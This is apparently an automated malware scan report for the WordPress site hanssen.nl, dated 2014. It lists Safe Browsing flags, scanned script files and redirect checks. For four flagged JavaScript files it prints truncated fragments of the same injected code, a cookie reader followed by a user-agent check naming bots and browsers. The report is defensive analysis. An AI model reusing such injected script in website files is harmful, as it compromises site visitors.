Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hanssen.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hanssen.nl/ | 200 OK Content-Length: 295655 Content-Type: text/html | clean |
http://www.hanssen.nl/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97457 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://www.hanssen.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8254 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.hanssen.nl/wp-content/plugins/bolcom-partnerprogramma-wordpress-plugin/resources/js/bol-partner-frontend.js?ver=3.9.2 | 200 OK Content-Length: 3679 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=4.6.3 | 200 OK Content-Length: 49777 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 9207 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/jquerytransit.js?ver=0.9.9 | 200 OK Content-Length: 7885 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/layerslider.transitions.js?ver=4.6.3 | 200 OK Content-Length: 22079 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/cardoza-facebook-like-box/cardozafacebook.js?ver=3.9.2 | 200 OK Content-Length: 1932 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery('#height_help').toggle(); }) jQuery('#cfbcolor_scheme').click(function(){ jQuery('#color_scheme_help').toggle(); }) jQuery('#cfbshow_faces').click(function(){ jQuery('#show_faces_help').toggle(); }) jQuery('#cfbstream').click(function(){ jQuery('#stream_help').toggle(); }) jQuery('#cfbheader').click(function(){ jQuery('#header_help').toggle(); }) }) Antivirus reports:
| ||
http://www.hanssen.nl//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 11:09:44 GMT Pragma: no-cache Location: http://www.hanssen.nl/translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=6ead7a0ba21efab2c0ca5955737fec42; path=/ X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.hanssen.nl/translate.google.com/translate_a/element.js?cb=googletranslateelementinit/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 11:09:44 GMT Pragma: no-cache Location: http://www.hanssen.nl Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=c0e9c3bc82aa1fafad7bddfc0a5344a5; path=/ X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.hanssen.nl/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 11:09:45 GMT Pragma: no-cache Location: http://www.hanssen.nl Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=fbe54c27743b992cd30e218118554240; path=/ X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.hanssen.nl/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 16303 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.1 | 200 OK Content-Length: 10713 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/module-info-box/info-box.js?ver=3.9.2 | 200 OK Content-Length: 1543 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/shortcode-content-slider/content-slider.js?ver=3.9.2 | 200 OK Content-Length: 4901 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/shortcode-gmap/jquery.gmap.min.js?ver=3.9.2 | 200 OK Content-Length: 4890 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/shortcode-gmap/gmap.js?ver=3.9.2 | 200 OK Content-Length: 1775 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hanssen.nl
Result:
GET / HTTP/1.1
Host: hanssen.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hanssen.nl
Referer: http://www.google.com/search?q=hanssen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hanssen.nl
Referer: http://www.google.com/search?q=hanssen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.